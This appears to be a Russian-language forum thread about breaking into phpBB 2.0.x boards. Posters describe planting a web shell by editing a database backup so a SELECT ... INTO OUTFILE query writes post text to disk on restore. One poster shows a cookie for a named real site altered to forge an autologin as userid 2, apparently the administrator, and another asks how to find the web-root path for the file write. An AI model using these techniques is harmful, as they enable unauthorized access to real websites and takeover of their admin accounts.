Не из 2.0.1 не из 2.0.13 не из админки какого либо другого форума phpBB веб шелл получить нельзя. Хотя у меня есть альтернативные варианты. Известно что когда бы делаешь backup, скачивается файл, содержащий mysql-запросы, которые выполняются после восстановления. Предположим что админ криво настроил с-му и у mysqld есть права на запись в какуюто папку)) Тогда мы бекапаем базу, потом редактируем чтобы выполнялся SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..." пишем соответствующий пост, чтобы его текст оказался в файле. Потом восстанавливаем базу, и запрос SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..." выполняется
по поваду взлома Взлом phpBB 2.0.12 3pricol3 (15:31) : # HTTP Cookie File # http://www.netscape.com/newsref/std/cookie_spec.html # This is a generated file! Do not edit. # To delete cookies, use the Cookie Manager. kartografs.net.ru FALSE / FALSE 1141647870 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2254%22%3B% 7D это написано в куке мозилки переделываю на 3pricol3 (15:31) : # HTTP Cookie File # http://www.netscape.com/newsref/std/cookie_spec.html # This is a generated file! Do not edit. # To delete cookies, use the Cookie Manager. kartografs.net.ru FALSE / FALSE 1141647870 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D и ничего не меняется 3pricol3 (15:31) : почему я что то нетак делаю? и я запуталась?
Ты говорил про строку типа: SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..." У меня такой вопрос - как грамотно прописать путь к папке, в которую идет запись, если я не знаю, где лежат файлы самого сайта, т.е. полный путь(типа home/.../www/forum) указать не могу
